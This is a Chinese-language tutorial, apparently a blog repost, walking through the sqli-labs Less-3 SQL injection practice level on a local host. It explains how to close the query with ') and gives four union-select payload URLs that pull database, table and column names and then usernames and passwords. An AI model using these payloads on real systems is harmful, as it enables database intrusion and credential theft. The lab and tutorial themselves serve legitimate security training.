今天我们来讲解 sqli-libs(3)
有括号的单引号报错 首先我们来查看加入‘看报错了 在加‘’ 没报错 证明 存在注入
然后我们看加入’的报错回显的是什么
和我们的sqli-libs(1)的报错对比一下
发现多了一个)证明他的语句变成了 id=那我们可以根据此特性构造闭合语句
我们查看源代码 发现确实是多了 括号的 我们此时在构造id=1‘)闭合前面的括号和引号 而后面的直接用%23闭合就行了
了解了语句构造方法后 我们开始执行我们的命令了
0x01爆数据库名称 和当前数据库
http://127.0.0.1/sql1/Less-3/?id=-1%27)%20union%20select%20null,null,(select%20group_concat(schema_name)%20from%20information_schema.schemata)%23
这里我们知道我们的当前数据库所以就不进行爆破了
0x02爆表名
http://127.0.0.1/sql1/Less-3/?id=-1%27)%20union%20select%20null,null,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27)%23
0x03爆列名
http://127.0.0.1/sql1/Less-3/?id=-1%27)%20union%20select%20null,null,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=%27users%27)%23
0x04爆字段名
http://127.0.0.1/sql1/Less-3/?id=-1%27)%20union%20select%20null,null,group_concat(username,0x3a,password)%20from%20users%23
其实在sql前面的关卡 只要你找到绕过思路 后面那些语句都是一样的 所以主要是思路
切记 少就是多 慢就是快
原文:https://www.cnblogs.com/-zhong/p/10887474.html